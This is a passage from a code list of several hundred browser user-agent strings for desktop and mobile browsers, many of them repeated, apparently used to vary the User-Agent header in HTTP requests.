'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
